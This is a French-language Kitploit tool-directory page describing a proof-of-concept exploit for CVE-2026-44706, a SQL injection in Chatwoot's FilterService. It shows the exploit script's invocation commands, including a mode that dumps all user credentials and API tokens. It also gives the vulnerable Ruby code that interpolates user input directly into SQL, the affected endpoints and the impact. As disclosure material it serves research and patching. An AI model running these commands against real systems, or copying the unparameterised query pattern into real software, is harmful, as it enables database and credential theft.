Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-44706 — Chatwoot injection SQL dans FilterService | Kitploit
Outils/GitHubGitHub/hakaioffsec/cve-2026-44706
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationApprentissage et ÉducationSécurité des Bases de Données
GitHubhakaioffsec/cve-2026-44706

CVE-2026-44706

Chatwoot injection SQL dans FilterService

Voir le dépôt
61il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Injection SQL dans Chatwoot FilterService

Un exploit de preuve de concept pour CVE-2026-44706, une vulnérabilité d'injection SQL dans FilterService#lt_gt_filter_values de Chatwoot qui permet à tout agent authentifié de lire l'intégralité de la base de données PostgreSQL, y compris les identifiants utilisateur et les jetons API. Lisez l'article complet ici.

Utilisation :

root@kitploit:~
# Verify injection (boolean-based)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check

# Time-based confirmation
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased

# Extract arbitrary SQL query result
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"

# Dump all user credentials and API tokens
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds

Versions vulnérables

  • Chatwoot ≤ 4.11.1

Cause racine

Dans app/services/filter_service.rb (ligne 91), l'entrée utilisateur est interpolée directement dans SQL sans paramétrage :

Télécharger l’outil
root@kitploit:~
def lt_gt_filter_values(query_hash)
  value = query_hash['values'][0]          # ← entrée utilisateur, sans assainissement
  operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
  "#{operator} '#{value}'::#{attribute_data_type}"   # ← interpolation brute
end

Chaque autre opérateur de la classe utilise des paramètres liés (:value_N). Seuls is_greater_than et is_less_than sont vulnérables.

Points d'accès concernés

  • POST /api/v1/accounts/:id/conversations/filter
  • POST /api/v1/accounts/:id/contacts/filter

Impact

CWE-89 Injection SQL. Tout agent/administrateur authentifié peut :

  • Lire l'intégralité de la base de données – utilisateurs, messages, jetons, données inter-comptes
  • Voler les identifiants – hachages bcrypt pour craquage hors ligne
  • Voler les jetons API – usurper l'identité de tout utilisateur, y compris les SuperAdmins
  • DoS – pg_sleep() pour épuiser les connexions à la base de données

CVSS

8.8 Élevé CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Avertissement

Cet outil est uniquement destiné à des fins éducatives et de recherche. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce programme.

QuimeraX Intelligence

QuimeraX Intelligence est une plateforme avancée de gestion de la surface d'attaque externe (EASM) et de renseignement sur les cybermenaces, spécialisée dans l'identification des vulnérabilités critiques dans les systèmes complexes. La plateforme surveille, détecte et alerte de manière proactive les clients sur les menaces de sécurité, garantissant la transparence et une réponse rapide aux risques potentiels. Les clients reçoivent des notifications immédiates et des rapports complets si leurs systèmes sont trouvés vulnérables, leur permettant de prendre des mesures de protection. en savoir plus

Hakai Security

Hakai Security est une entreprise de cybersécurité fondée par des professionnels de la sécurité, engagée dans l'excellence technique. Nous proposons des solutions de sécurité sur mesure, notamment des tests de pénétration avancés, des simulations réalistes d'équipe rouge et des pratiques de développement sécurisé pour protéger de manière proactive les actifs de nos clients contre les cybermenaces en constante évolution.

Hacking Club

Hacking Club est la plateforme de formation où vous apprenez la cybersécurité grâce à des leçons pratiques, des laboratoires et des défis créés par des experts travaillant dans notre cabinet de conseil en sécurité : directement du champ de bataille à votre formation. Pratiquez la vulnérabilité présentée dans ce dépôt par le hacking club ! en savoir plus